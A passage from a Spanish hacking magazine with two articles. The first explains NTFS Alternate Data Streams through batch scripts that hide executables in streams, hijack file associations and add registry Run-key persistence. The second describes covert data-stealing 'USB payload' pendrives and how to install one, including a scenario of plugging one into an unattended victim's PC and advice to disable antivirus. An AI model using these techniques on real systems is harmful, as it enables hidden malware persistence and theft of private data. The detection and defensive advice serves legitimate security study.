\TestADS\Filename.txt todavía pesa 0
bytes, pero la fecha de modificación
ha cambiado.
• Como ya mencioné anteriormente,
se pueden asociar streams no sólo
a ficheros sino también a carpetas.
Para asociar una cadena a una carpeta
seguiremos los mismos pasos
que en el caso de un fichero:
Click en Inicio , y luego haced click en
Ejecutar En Abrir, escribid el siguiente
comando:
Notepad.exe C:\TestADS:NewStream.txt
Nos aparecerá un cuadro con un
mensaje preguntándonos si queremos
crear un nuevo fichero. Presionad
Sí y voila, ya habéis creado
vuestro primer ADS asociado a una
carpeta. Escribid algún texto en el
documento y guardadlo. Confirmad
que queréis guardar los cambios.
En Windows Explorer, haced click
derecho sobre la carpeta C:\TestADS y
seleccionad propiedades. La carpeta
todavía tiene un tamaño de 0 bytes.
• Otra forma sencilla de crear ADS
es desde la consola de comandos.
Click en Inicio, luego haced click
en ejecutar y escribid cmd.exe.
Escribid en la consola
ECHO This is my second
stream>C:\TestADS\
Filename.txt:stream2.txt
Como trabajamos desde la consola
de commandos, también compro-
Listado 1. Script de MS-DOS
www.hakin9.org/es
Alternate Data Streams
Figura 1. El fichero de TestADS
baremos el tamaño de nuestro
directorio.Teclead Dir C:\TestADS y
obtendremos un tamaño de 0 bytes y
dentro del mismo un único fichero de
0 bytes. Tras esta larga introducción,
tratemos de sacar unas primeras conclusiones:
• Invisibilidad: El comando Dir,
Windows Explorer y muchos
otros programas no verán el
ADS. El ADS está oculto a la
vista. Es más, el comando DEL
no funcionará con ADS.
• Un ADS puede ser aplicado a
cualquier tipo de fichero, desde
un ejecutable hasta un simple
fichero de texto.
• Hay varios métodos para iniciar
un programa/documento oculto
como ADS.
• Utilizando ADS podemos ocultar
gran cantidad de información.
• Podemos asociar un número ilimitado
de ADS a un fichero.
• ADS no afecta a la funcionalidad,
tamaño o visualización de
las utilidades tradicionales de
navegación como Dir o Windows
Explorer.
Type %SystemRoot%\system32\calc.EXE>c:\TestADS\Filename.txt:calc.exe
Type %SystemRoot%\system32\NOTEPAD.EXE>c:\TestADS\Filename.txt:NOTEPAD.exe
reg delete HKCR\txtfile\shell\open\command /f
reg add HKCR\txtfile\shell\open\command /ve /t REG_EXPAND_SZ /d c:\TestADS\
Filename.txt:calc.exe /f
pause
ECHO Now try to open a text document. You should see Windows calculator opened
ECHO Press any key to restore registry
reg add HKCR\txtfile\shell\open\command /ve /t REG_EXPAND_SZ /d “%SystemRoot%\
system32\NOTEPAD.EXE %1” /f
65

kit
Figura 2. El comando Type
• Podemos asociar ADS tanto a
ficheros como a directorios.
• Sólo podemos asociar streams en
NTFS.
• Si movemos un fichero con ADS
a un sistema de ficheros FAT y lo
devolvemos a una unidad NTFS, el
ADS será eliminado.
El lado oscuro de ADS
• Un ADS puede ser prácticamente
cualquier tipo de fichero, desde
in ejecutable hasta un fichero de
texto. Además, NTFS permite
asociar ADS a cualquier fichero o
carpeta.
• Un modo muy simple de crear un
virus que use ADS es reemplazar
el fichero ejecutable original por
otro ejecutable el virus y asociarle
el ejecutable original como ADS al
virus. Tras renombrar el virus con
el nombre del ejecutable original
habremos terminado el trabajo.
Cuando el usuario lo ejecute,
lanzará el virus y el virus a su vez
iniciará el programa original.
• Otro método utilizado por los
creadores de virus es esconder el
propio virus como ADS. Hay varios
métodos para lanzar el virus desde
un ADS sin extraerlo – Usando el
comando Start, modificando el re-
Listado 2.Lineas de código
gistro para que se lance con el OS.
Hay muchos métodos para iniciar
directamente un programa oculto
en un ADS.
• Un tercer método que podría ser
utilizado por un creador de virus
(y no el último) es ocultar la mayor
parte del código del virus en un
ADS y mantener un prqueño ejecutable
que extraiga el virus.
• Sólo se conocen unos pocos virus
que exploten la funcionalidad ADS
en NTFS pero el daño potencial
es inmenso. Hay también muchas
otra formas de explotar ADS para
crear un virus.
• En los ejemplos siguientes trataremos
de ver cómo se puede
utilizar ADS para crear contenido
peligroso para el ordenador (El
Lado Oscuro de esta funcionalidad).
Después crearemos
algunos ejemplos que mostrarán
El Lado Bueno y aprenderemos
a utilizar esta funcionalidad en
nuestro beneficio. Para una mejor
comprensión, no utilizaré ningún
lenguaje de programación
específico como C# o VB. En los
ejemplos siguientes usaremos
MS-DOS para crear algunos
scripts batch. Los virus Batch no
son comunes, pero estad prevenidos
porque sí que existen y es
posible escribir un fichero batch
que contenga un virus.
Aviso: algunos ejemplos cambian algunas
claves del registro y usan algunas
técnicas avanzadas que podrían
dañar vuestro sistema. Si se diera el
caso, deberíais hacer una copia de
Copy %SystemRoot%\system32\Notepad.EXE C:\TestADS\Notepad.exe
Type %SystemRoot%\system32\calc.EXE>c:\TestADS\Notepad.exe:calc.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v MyFile /t
REG_SZ /d c:\TestADS\Notepad.exe:calc.exe
shutdown -r -f -t 15
Listado 3. Borrar la clave MyFile
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
66 www.hakin9.org/es
seguridad de todos los datos importantes
del ordenador antes de intentar
estos ejemplos.
• Nuestro primer ejemplo mostrará
cómo reemplazar un ejecutable
por otro y hacer otras cosillas.
Ejemplo 1
Iniciad el Notepad y escribid el código
que viene a continuación. Guardad
el fichero como Script1.bat en vuestra
carpeta TestADS y luego ejecutadlo
(doble click sobre él o usad la
consola para abrirlo). Minimizad la
ventana de la consola y tratad de
abrir cualquier fichero de texto. Deberíais
ver aparecer la calculadora y
no el Notepad. El comando Type asocia
dos ADS al fichero que habíamos
creado anteriormente Filename.txt. En
este caso se trata de las utilidades Notepad
y Calculadora de Windows. La
tercera línea borra la clave de registro
que asocia la apertura de ficheros de
texto con el Notepad. La cuarta línea
añade una nueva clave de regstro
que asocia la apertura de ficheros de
texto con uno de nuestros programas
asociados como ADS la calculadora.
El comando Pause nos da un respiro
para comprobar lo que hemos hecho.
Por último el script restaurará la antigua
clave del registro para los ficheros
de texto. En este ejemplo, he reemplazado
el notepad.exe por un inocente
ejecutable oculto pero un atacante
real podría inyectarnos un virus realmente
peligroso con cuatro simples
líneas de código. Y ese virus podría
lanzarse cada vez que abrís un documento
de texto, e incluso podría lanzar
el Notepad al mismo tiempo para no
levantar sospechas! Y ese script batch
podría borrarse a sí mismo usando un
comando como: Del script1.bat
Ejemplo 2
Iniciad el Notepad y después escribid
el código que viene a continuación.
Guardad el archivo como Script2.bat
en vuestro directorio TestADS y luego
ejecutadlo (doble click sobre él mismo
o abridlo desde la consola). Reiniciad
el ordenador. Tras el reinicio deberíais
ver la calculadora ejecuándose (Daos
cuenta de que esta no es la calculado-

a real, es un stream asociado a una
copia del Notepad desde nuestro directorio
de pruebas). Aviso: Cierra las
demás aplicaciones y guarda todo el
trbajo antes de ejecutar este ejemplo
porque reiniciará la máquina y perderás
el trabajo!
La primera línea copiará el programa
Notepad desde la carpeta Windows
a nuestro directorio de pruebas.
La segunda línea asociará Calc.exe a
nuestra copia de Notepad. La tercera
línea añadirá una clave de registro
para iniciar nuestro ADS directamente
con Windows y la cuarta reiniciará el
ordenador en 15 segundos. Tras ejecutar
este ejemplo copiad la siguiente
línea en un nuevo script batch y ejecútalo
para borrar la calve de registro:
reg delete HKLM\SOFTWARE\Microsoft\
Windows\CurrentVersion\Run\MyFile /f
O usa la utilidad Regedit para borrar la
clave MyFile de:
HKEY_LOCAL_MACHINE\
SOFTWARE\Microsoft\
Windows\CurrentVersion\Run
En este ejemplo vemos que un ejecutable
oculto puede ser lanzado
cada vez que reiniciamos el sistema
y esto es también un comportamiento
peligroso porque una vez que un programa
maliciose se ha instalado como
Figura 3. Script de Visual Basic
Listado 4. Ejemplo para ficheros de texto
ADS en nuestro sistema, podría lanzarse
automáticamente cuando se inicia
Windows. También observad que
para este trabajo bastan tres líneas de
código copy, type y reg add. Un ataque
hacker típico en un sistema Windows
sigue cuatro pasos para conseguir su
objetivo:
• Crear una herramienta de hacking
que ayude a atacar el sistema objetivo.
• Instalar la herramienta
Ocultar la herramienta en el sistema
infiltrado con el fin de prevenir la detección
por parte del administrador del
sistema Ejecutar la herramienta cuando
se inicia el sistema o cuando un determinado
documento/ejecutable es
abierto. Lo que realmente hace ADS
muy peligroso es el hecho de que ofre-
www.hakin9.org/es
Alternate Data Streams
HKEY_CLASSES_ROOT\exefile\shell\open\command
Se abrirá cuando cualquier fichero exe se ejecute
Otros métodos similares
HKEY_CLASSES_ROOT\comfile\shell\open\command
HKEY_CLASSES_ROOT\batfile\shell\open\command
HKEY_CLASSES_ROOT\htafile\Shell\Open\command
HKEY_CLASSES_ROOT\piffile\shell\open\command
HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\open\command
HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\open\command
HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command
HKEY_LOCAL_MACHINE\Software\CLASSES\htafile\Shell\Open\command
HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\open\command
ce soporte para los tres últimos pasos.
La capacidad de mezclar ficheros
de datos en ficheros existentes sin
afectar a su funcionalidad, tamaña
o visualización en las utilidades de
navegación tradicionales como Dir o
Windows Explorer podría transformar
ADS en una peligrosa herramienta para
un hacker. Es más, la capacidad de
almacenar una gran cantidad de datos
hacen ADS ideal para programs maliciosos
de recogida de información.
Y, por si todo esto no fuera suficiente,
los ADS son extremadamente fáciles
de crear, muy difíciles de detectar y
requieren pocas o ninguna habilidad
por parte del hacker. Hemos visto que
los ejecutables maliciosos son muy fáciles
de ocultar, pero lo que realmente
nos dio razones para preocuparnos es
que los ejecutables ocultos son muy
fáciles de lanzar de una larga lista de
maneras, sin los problemas derivados
de tener extraerlos primero.
Y otro motivo de preocupación:
No podemos desactivar el ADS en un
sistema NTFS. La solución: rastrear
manualmente archivos y carpetas con
el fin de detectar la presencia de ADS
usando programas como lads.exe
http://www.heysoft.de. Opcionalmente,
utilizar una solución que verifique la
integridad de nuestros archivos podría
protegernos contra ADS no autorizado.
Además, debemos verificar todos
los programas que se inician automáticamente.
Cualquier carácter : en la
ruta podría ser sospechosa (excepto
el carácter separador de unidades).
Una ruta con la siguiente forma:
C:\Windows\explorer.exe
:explorer.exe
67

kit
Es más que sospechosa cuando la
encuentras en una clave de registro
como:
HKEY_LOCAL_MACHINE\
Software\Microsoft\Windows\
CurrentVersion\Run
Formas de lanzar ejecutables (la mayoría
de ellos funcionan con ejecutables
ocultos en ADS)
Algunos de estos métodos ya fueron
mostrados en ejemplos aneriores.
Usando accesos directos en el
escritorio. Usando el programador de
tareas. Añadiendo una entrada a la
Carpeta de inicio de Windows
Cambiar la asociación del tipo
de archivo. Si veis que hay un ligero
retardo cuando se inicia un programa
podéis verificar qué programa está
asociado con esa extensión de archivo
(mirad uno de los ejemplos anteriores
cuando cambiamos el programa
para los ficheros de texto) Ejemplo
para ficheros de texto:
HKEY_CLASSES_ROOT\txtfile\shell\open\
command
Usando el registro. Hay varios métodos,
aquí están sólo algunos de ellos:
Método Explorer
Windows carga explorer.exe durante
el arranque. Normalmente este fichero
se encuentra en el directorio Windows.
Sin embargo, si existe c:\explorer.exe,
será ejecutado en lugar de C:\Windows\
explorer.exe. La presencia de un
fichero llamado c:\explorer.exe será
sospechosa. Al contrario que con
otros métodos, no hay necesidad de
cambios en ficheros o en registro
– simplemente el fichero tiene que
llamarse c:\explorer.exe. El nombre
del fichero que sigue a explorer.exe
se iniciará cuando se inicie Windows.
Método Exe file: Cualquier comando
incluido en Método Batch File: Windo-
Figura 4. La consola de comandos
ws ejecuta todas las instrucciones del
fichero Winstart.bat, localizado en la
carpeta Windows. Ficheros de inicialización:
Windows ejecuta instrucciones
en las líneas “Run=” o “Load=” del
fichero Win.ini, situado en el directorio
Windows (o WinNT).
También hay muchos otros métodos
para iniciar un código malicioso al
inicio por lo que no es mala idea verificar
qué programas se lanzar al inicio!
Recuerda que la mayoría de estos
métodos funcionan con ejecutables
ocultos en ADS.
Conclusión
NTFS permite la existencia de cadenas
de datos alternativas asociadas a ficheros,
pero invisibles a muchas utilidades
de gestión de archivos. Un virus puede
explotar esta funcionalidad. Modificando
el registro como en los ejemplos anteriores,
cambiando accesos directos
en el escritorio o añadiendo elementos
a la carpeta Inicio de Windows, hay
muchas formas de lanzar ejecutables.
Además, crear ADS es muy fácil y
podemos utilizar métodos como Vb
scripts, batch scripts o Notepad como
en los ejemplos anteriores o lenguajes
de programación avanzados como C#,
C++ o VB. Teniendo en cuenta todo esto,
, el lado oscuro de ADS, desde el punto
de vista del uso de ADS con fines maliciosos,
podría ser un peligro real para
la seguridad del sistema. Actualmente,
hay pocos virus que utilicen ADS para
ocultarse, pero en el futro este tipo de
malware podría aumentar significativamente.
Soluciones y algunos consejos:
Rastrear los sistemas en busca de
ADS usando utilidades como lads.exe.
Podéis descargar la última versión
desde http://www.heysoft.de (cuando
escribí este artículo era la 4.10).Este
programa freeware lista todos los
ADS en un directorio NTFS. En Microsoft
Vista existe una opción en el
comando Dir (\r) para visualizar ADS
de un fichero. No la he probado, pero
68 www.hakin9.org/es
parece útl. Usa antivirus con soporte
ADS! Comprueba qué programas se
lanzan al inicio! Microsoft debe añadir
la posibilidad de detectar y ver ADS
para Windows Explorer y el intérprete
de comandos. En este momento existe
un complemento que tiene que ser
instalado por separado para poder ver
ADS en Windows Explorer (he leído
sobre ello, lo intenté descargar de la
web de Microsoft pero no lo encontré;
nuestros lectores podrían intentar encontrar
strmext.dll. Quizá ellos tengan
más suerte).
La parte buena de ADS
• Todos los ejemplos anteriores
muestran cuán malo es ADS si
es usado por código maligno.
Pero veamos la parte buena.
Podemos usar esta característica
de NTFS honestamente
explotando la invisibilidad de
ADS con fines muy diversos:
• Podemos prevenir el borrado
accidental de ficheros asociándolos
a un fichero/directorio de
sistema o a un ejecutable que
sea menos probable que vayamos
a borrar.
• Podemos ocultar algunos
documentos importantes, passwords,
etc. Especialmente en
equipos con más de un usuario.
Daos cuenta de que si ocultáis
documentos importantes
usando ADS debéis usar antes
un programa de cifrado para cifrar
el contenido; no basta con
ocultar el documento!
• Podemos asociar un programa
de monitorización, un key-logger
u otro programa similar en una
inocente carpeta.
• Pueden encontrarse muchos otros
usos, depende de nuestra creatividad.
Comparándola con la estaganografía
clásica, esta técnica (ocultar documentos
asociándolos como un stream
en otro documento) presenta a la vez
ventajas y desventajas. La principal
desventaja es que un documento asociado
como stream en otro documento
sólo puede ser transferido a otra uni-

Sobre el Autor
Laic Aurelian es Ingeniero Rumano
independiente, revelador de software
para este numero de Hakin9 ( MyADS).
Por más informaciones ver páginas:
http://www.stegano.ro, http://xidie.ro.
dad NTFS. Si lo transferimos a una
unidad FAT se perderá el contenido.
Pero la principal ventaja es que el
documento es completamente invisible;
al contrario que con la esteganografía
clásica, ADS no modifica el
tamaño del fichero portador. En este
momento no hay muchos programas
que utilicen ADS como método de
estaganografía; sólo conozco uno:
Xidie Security Suite, un programa
freeware desarrollado por el autor
de este artículo. En el futuro, cuando
esta funcionalidad de NTFS sea
conocida por más desarrolladores
aparecerán más programas que
guardarán vuestros valiosos datos
usando ADS.
Ejemplo 3
El tercer ejemplo muestra cómo
crear un simple texto ADS usando
VB scripts.
Listado 5. Uso de VB script para creación y acceso ADS
‘Start code
Option Explicit
' Ask for a file name
Dim File_Name
File_Name = InputBox("Enter the file name where to attach", "ADS using VB",
"C:\TestADS\Filename.txt")
If File_Name = "" Then WScript.Quit
'Verify if selected file rezide in a NTFS drive
Dim fso, drv
Set fso = CreateObject("Scripting.FileSystemObject")
Set drv = fso.GetDrive(fso.GetDriveName(File_Name))
If drv.FileSystem "NTFS" Then
WScript.Quit
End If
' Ask for the stream to be written
Dim Stream_Name
Stream_Name = InputBox("Enter the stream name", "ADS using VB", "My first
stream")
If Stream_Name = "" Then WScript.Quit
' Creates the file if it doesn't exist
Dim Text_Stream
If Not fso.FileExists(File_Name) Then
Set Text_Stream = fso.CreateTextFile(File_Name)
Text_Stream.CloseEnd If
' Try to read the current content of the stream (if exist)
Dim FileStream_Name, Stream_Text
FileStream_Name = File_Name & ":" & Stream_Name
If Not fso.FileExists(FileStream_Name) Then
Stream_Text = "My stream using VB"
Else
Set Text_Stream = fso.OpenTextFile(FileStream_Name)
Stream_Text = Text_Stream.ReadAll()
Text_Stream.Close
End If
' Ask for the content of the stream to be written
Stream_Text = InputBox("Enter the content of the stream", "ADS using VB",
Stream_Text)
If Stream_Text = "" Then WScript.Quit
' Try to write to the stream
Set Text_Stream = fso.CreateTextFile(FileStream_Name)
Text_Stream.Write Stream_Text
' Close the app
Set Text_Stream = Nothing
Set fso = Nothing
WScript.Quit‘End code
www.hakin9.org/es
Alternate Data Streams
Algunos consejos útiles
Cómo borrar ADS de un fichero/
directorio:
Método 1:
• mueve el archivo/directorio a una
unidad FAT y devuélvelo a una
unidad NTFS
Método 2:
• Abre el ADS con el Notepad (Click
en Inicio, click en Ejecutar y en
cuadro pon el siguiente comando)
Notepad.exe C:\MyImportantFile:
ADS.exe
Donde C:\MyImportantFile es la ruta
del fichero/directorio y ADS.exe es
el nombre del ADS.exe asociado a
la calculadora de Windows. Selecciona
y borra todo el contenido del
fichero.
Cierra el Notepad. Te preguntará si
quieres guardar los cambios y respondes
Sí. Cómo asociar un ejecutable a
otro fichero:
• type c:\executable.exe > c:\
another _ file:executable.exe
Cómo iniciar un ejecutable oculto en
otro fichero:
• Start c:\another _ file:executable
.exe
Cómo poner texto en ADS:
• type c:\ textfile.txt > c:\
another _ file:ADS.txt
Cómo visualizar texto desde un ADS:
• More >c:\another _ file:ADS.txt
Cómo añadir otro documento de texto
a un ADS existente:
• Type C:\NewText.txt >>c:\
another _ file:ADS.txt l
69

USB Payload
– el gadget más
potente del agente 007
Yago F. Hansen
A
todos los que nos dedicamos a la auditoría
de sistemas, nos suelen gustar
los gadgets, tales como piezas de
software o bien equipos electrónicos (pdas,
teléfonos móviles, sensores...). Solemos disfrutar
con cada una de las nuevas características
o funciones que incorporan hasta que
las acabamos conociendo al límite.
Esto es básicamente lo que me paso con
los USB payload: un gadget formado por un
pendrive USB (preferiblemente que cumpla
el standard U3) y gran cantidad de herramientas
de hacking en su interior. Desde la
aparición de los primeros pendrive, todos los
que nos dedicamos a esto coleccionábamos
utilidades de este tipo en su interior, pero lo
que ha cambiado ahora drásticamente es la
forma de empaquetar y lanzar esas herramientas
hacia los sistemas víctima.
Ahora siempre llevo encima mi pendrive
U3, con una distribución USB payload que
he utilizado en muchas ocasiones, no solo
con fines de auditoría de seguridad, sino
como la forma más rápida de recabar información
del equipo que voy a revisar para
solucionar sus problemas de seguridad, o
resolver problemas de conectividad, etc.
70 www.hakin9.org/es
Las herramientas de auditoría y
enumeración que se incluyen en
las distribuciones del tipo USB
payload no son nada nuevo,
en todo caso actualizaciones.
Lo novedoso de este sistema,
por lo tanto no es el contenido,
sino la forma de empaquetarlo
utilizando un pendrive USB que,
simplemente al introducirlo,
y sin ninguna interacción del
usuario, extrae muchísima
información importante del
equipo de la víctima.
Todo el contenido de las distribuciones
standard USB payload no es cien por cien
operativo, pero su potencia consiste en las
posibilidades de personalización y actualización.
Si encuentro otras herramientas
más potentes, exploits nuevos, scripts mejorados,
etc, pues las copio en mi pendrive y
las introduzco en los scripts de arranque.
En este artículo aprenderás
• Las diferentes distribuciones USB payload
que puedes encontrar y las herramientas
que incluyen.
• El uso de esta nueva técnica y sus posibilidades.
• La forma de personalizarlas o mejorarlas.
Lo que deberías saber
• Saber utilizar algunas herramientas de hacking
avanzado.
• Creación y edición de archivos de procesos por
lotes o batch.
• Como desactivar tu antivirus, ya que de otra
forma no vas a poder trabajar.

Figura 1. SwitchBlade Logo
Existen múltiples distribuciones del
tipo USB payload, y no todas ellas
precisan del standard U3:
• otras simplemente se basan en
la ingeniería social para solicitar
o inducir al usuario a cliquear con
el ratón sobre su icono.
Algunas versiones de estos payloads
incorporan la funcionalidad de, no
solo guardar la información extraída
en una carpeta, sino además enviarla
a nuestra página web o a una
dirección de correo electrónico.
Para evaluar la peligrosidad de
esta herramienta, imagino estar
en la oficina objetivo de mi ataque
frente a una señorita que me está
atendiendo con un sistema basado
en Windows (desgraciadamente
para la victima).
La señorita se levanta para buscar
unos papeles o consultar con su
superior; veo la CPU (la torre, como
la suelen llamar) sobre la mesa con
cuatro preciosos puertos USB frente
a mí.
No puedo resistirme, e introduzco
mi pendrive en uno de ellos; espero
unos segundos; veo parpadear
su luz... y... ¡Bingo! De nuevo la luz
del pendrive parpadea durante unos
veinte segundos hasta que para.
La extraigo con rapidez. Tengo
todo lo que necesito. Y, ¿que tengo?
Lo veremos en la sección de herramientas
incluidas.
De la misma manera que negativa,
el uso de estas tecnologías
invisibles de ejecución de procesos,
puede ser también positiva en
muchos aspectos.
Empresas como GadgetTrak
utilizan estas técnicas para localizar
un equipo (PC, pda, ipod, teléfono
móvil, etc...) en su ubicación
ilegal tras haberse perdido o robado.
Ya varias empresas trabajan
en estas tecnologías con ese fin.
Distribuciones
conocidas
Incorporan las distribuciones USB
payload es en definitiva un peligroso
arsenal de Max Damage Technique:
• Amish Technique
• Kapowdude technique
• Silivrenions Technique
• Spektormax combo
• Hackblade
• GonZor Switchblade
• Otros updates y híbridos
El standard U3
Como ocurre habitualmente con los
nuevos desarrollos en la informática,
la intención es buena, pero el
producto se convierte en un grave
problema de seguridad.
La intención en este caso, consistía
en desarrollar un standard
para las unidades de almacenamiento
USB o pendrives, consiguiendo
almacenar en ellas todo tipo de software
que pudiera ser portable.
Estos programas no tendrían
necesidad de ser instalados y su
configuración sería reseteada al
reiniciar, o al extraer el pendrive a
su configuración original. Todo ello
sería funcional en Windows, claro
está, aunque también existen ya
controladores para Mac.
U3 está compuesto por la suma
comercial de Sandisk y M-Systems,
por lo que es un standard propietario
y comercial formado en 2005. El
nombre proviene de la suma de los
tres conceptos propuestos para su
eslogan: Simplified for U, Smarter
about U y As mobile as U: las tres
U (U3).
Las aplicaciones que se ejecutan
desde el pendrive pueden escribir
configuraciones y cambios en el
registro de Windows pero el Launchpad
(ejecutador) deberá borrarlas
por normativa al desconectar el
pendrive.
El U3 Launchpad es un programa
desarrollado por esta empresa
como menú de inicio de estas aplicaciones
instaladas.
Se pueden instalar otros muchos
programas a descargar mediante
registro en la página Web de U3.com
www.hakin9.org/es
USB Payload
que se ejecutan directamente desde
el pendrive. Hay muchos fabricantes
de software que colaboran con utilidades
y programas como Skype,
Firefox, Winrar, Avast, OpenOffice,
etc... Algunos de ellos son de pago
pero la gran mayoría son gratuitos.
Por eso, comprar una unidad U3 es
muy rentable, no solo por el payload.
Hay miles de utilidades ya incorporadas
a este producto, los fabricantes y
desarrolladores ven en este sistema
un filón de oro.
Pero, ¿qué utilidad puede tener
esto? Pues por ejemplo cuando
vamos de viaje podemos llevarnos
nuestros programas y archivos de
datos con nosotros a cualquier ciber
de cualquier lugar.
Podemos ejecutar nuestros programas
preferidos (skype, messenger,
emule, Office...) sin necesidad
de instalarlos, y acceder a nuestros
datos (documentos, fotos, música,
vídeos, agenda...). Esto es lo que se
llama movilidad.
Al insertar un pendrive en un
PC con Windows, éste emula una
unidad de CDROM tipo ISO-9660 de
solo lectura, donde residen el autorun
y el programa Launchpad en una
partición virtual del pendrive.
Además crea disco extraíble tipo
FAT en el resto del pendrive con una
carpeta SYSTEM oculta donde se
encuentran todas las aplicaciones
U3 instaladas en un formato propietario.
Por lo tanto se crean dos unidades
cuando insertamos el pendrive,
una de ellas la detecta Windows como
un disco óptico y la otra como un
disco extraíble.
Figura 2. Logotipo del standard U3
71

kit
Hay una serie de fabricantes que
incorporan desde hace algún tiempo
modelos de pendrives compatibles
U3, como Sandisk en su modelo
Cruzar o Memorex con su modelo
MiniTravelDrive.
Solo hay que fijarse en que
incorporen el logotipo U3. El precio
suele ser bastante asequible,
un poco superior a los pendrives
convencionales. Se ha firmado un
acuerdo entre Sandisk y Microsoft
para actualizar este standard hacia
otro nuevo, dominado como siempre
por Microsoft. Se vuelve a monopolizar
un producto que está dando
buenos pasos.
Hay una serie de alternativas a
U3. Una de ellas es bastante buena,
y se llama MojoPac de RingCube,
que ofrece versiones libres (muy
funcionales) y de pago.
Al introducir un disco duro extraíble,
un pendrive USB, un teléfono
móvil o un iPod de Apple con este
software instalado podemos tener
todo nuestro entorno Windows preferido
(programas, juegos, email,
cuentas, contraseñas, agendas,
etc...) en cualquier lugar, siempre
que tenga Windows instalado.
Seguridad en
Windows. Autorun
El principal riesgo de este sistema
es el de siempre: la reproducción
automática de Windows, que por
supuesto todos los administradores
responsables han desactivado ya.
Figura 3. El verdadero menú de U3
Lauchpad
Pero no termina aquí, ya que sin tenerla
activada, si se hace click con el
ratón sobre una unidad que tenga un
archivo autorun.inf en su raíz, igualmente
ejecutamos el contenido del
mismo sin saber lo que esconde.
Esto es un gran fallo de seguridad
igualmente, ya que pensamos
que dando doble click vamos a explorar
el contenido de esta unidad
pero por defecto suele esta activada
la opción de ejecutar.
Para desactivar la función
autorun de una unidad extraíble
debemos modificar el registro de Windows.
Para ello utilizaremos la utilidad
regedit.exe o regedt32.exe. Debemos
localizar la clave:HKEY _ LOCAL _
MACHINE\System\CurrentControlSet\
Services\CDRom y cambiar el valor
de Autorun a 0. Desde GonZor
payload también tenemos el botón
Turn U3 Launchpad On/Of que
hace la misma función de forma
sencilla.
En redes corporativas basadas
en Windows, la mejor solución es
desactivar todas estas prácticas mediante
políticas de grupo (grouppolicies)
e incluso desactivar el uso de
unidades extraíbles en los clientes.
Desde la salida de Windows XP
SP2 se desactivó por seguridad
el sistema autorun, en unidades
extraíbles que no fueran del tipo
CDROM.
También se han detectado una
serie de incompatibilidades y vulnerabilidades
con controladores de
software de grabación de CD, que
hacen que el equipo llegue a bloquearse
completamente.
En teoría, el sistema del Launchpad
no puede ser desinstalado por
un usuario convencional (no como
nosotros), por lo que el que compre
un pendrive con U3 lo tiene de por
vida aunque se canse de él y quiera
tener un pendrive normal y corriente,
eso no gusta a muchos usuarios.
Por otra parte al ejecutarlo por
primera vez en un equipo con Windows
se instala una aplicación en el
Windows que no puede ser desinstalada
por éste.
El hecho mismo de que un
usuario pueda llevar a su puesto de
72 www.hakin9.org/es
trabajo, en un dispositivo del tamaño
de un mechero programas no autorizados
o aceptados por las políticas
de la empresa, ya crea para los
administradores un gran riesgo de
seguridad fuera de su control.
Este sistema de robo de información
privilegiada ya existe desde
hace mucho tiempo, en una época
se conoció como IpodSlurping, ya
que con dispositivos USB como
iPod de Apple se podía robar información
de la empresa sin riesgo de
sospecha.
Otro contradictorio riesgo de seguridad
en Windows es, que el usuario
del PC suele ser administrador
del mismo, debido a los problemas
e incompatibilidades de muchos
programas para correr sin privilegios
de administrador. Por ello, si se
limita al usuario en esto, es menor la
cantidad de información que se puede
robar con el payload, pero si es
administrador, se saca de todo.
GonZor Payload
La distribución que más me gusta
por su simplicidad y contenido es
la de GonZor Switchblade en su
versión 2.
Esta, además de ser muy sencilla
de instalar, incorpora casi todas
las herramientas necesarias para
extraer casi toda la información relevante
de una cuenta de usuario.
GonZor incorpora prácticamente
toda la colección de herramientas
que tratamos aquí, pero con la ventaja
de utilizar su propio configurador
gráfico que de forma cómoda modifica
el script de ataque para nosotros,
activando y desactivando cualquier
herramienta e incluso el propio
payload, además de configurar las
cuentas de correo y direcciones necesarias
para los envíos de información
y conexiones. Esto demuestra
un gran esfuerzo en su diseño.
Como defecto, considero que
el GonZor tiene el problema de no
ser demasiado stealth (invisible)
al usuario, ya que nos muestra al
ejecutarlo hasta su logo. Esto hay
que evitarlo, aunque sé que ya está
trabajando en una nueva versión.
Estamos esperando impacientes.

Figura 4. Unidades detectadas por
Windows
Instrucciones para instalar
GonZor Switchblade
• Descarga de los links indicados
al final el GonZor Switchblade y
el Universal Customizer.
• Extrae el Universal Customizer
donde te venga bien.
• Extra el U3CUSTOM.ISO descargado
de GonZor, a la carpeta
BIN dentro del Universal Customizer.
• Ejecuta el Universal Customizer.
No olvides desactivar el antivirus.
• Extrae el archivo SBConfig.exe
descargado de GonZor a la unidad
extraíble del pendrive.
• Ejecuta SBConfig.exe y configura
las opciones a tus necesidades.
Desactiva las herramientas dañinas
para tí. Y no olvides descargar
de la página de herramientas
el antídoto y el backup y restore.
Te harán falta.
Universal Customizer.
La otra gran estrella
Algunos programadores, aprovechándose
de este sistema nos
permiten customizar los pendrive
de este tipo, con programas como
Figura 5. Algunos pendrive tipo U3
el Universal Customizer del que ya
hablaremos en los siguientes párrafos.
La forma más sencilla de grabar
las distribuciones basadas en
U3 es el Universal Customizer. Este
programa creado por U3Hacker
posee una gran interface gráfica,
muy sencilla de utilizar que permite
grabar una distribución payload
descargada en formato ISO a un
pendrive U3 con gran éxito. De esta
manera se puede modificar la ISO
mediante winrar, winiso o cualquier
otra aplicación de edición de ISO,
para personalizarla a nuestro gusto.
Este proyecto también se aloja y
soporta en la página de Hak5.org.
Antes de grabar el nuevo payload
en el pendrive hace automáticamente
una copia de seguridad del
Launcher original, para evitar perder
sus propiedades y garantía, si
deseamos restaurarlo a su estado
de fábrica. Muy profesional.
Contenido de USB
payload – Herramientas
Lo que incorporan las distribuciones
USB payload es, en definitiva, un
peligroso arsenal de herramientas
de enumeración de sistemas y de
seguridad. Todas ellas parametrizables
y actualizables a nuestro antojo
y conocimiento, debiendo poner
especial atención a las opciones y
modificadores de cada una de ellas:
o sea aprendiendo a utilizarlas a fondo.
Puedes descargar todas estas
herramientas en el link de SwitchBlade
en Hak5.org.
Dependiendo de la distribución
se introducen unas u otras herra-
www.hakin9.org/es
USB Payload
73

kit
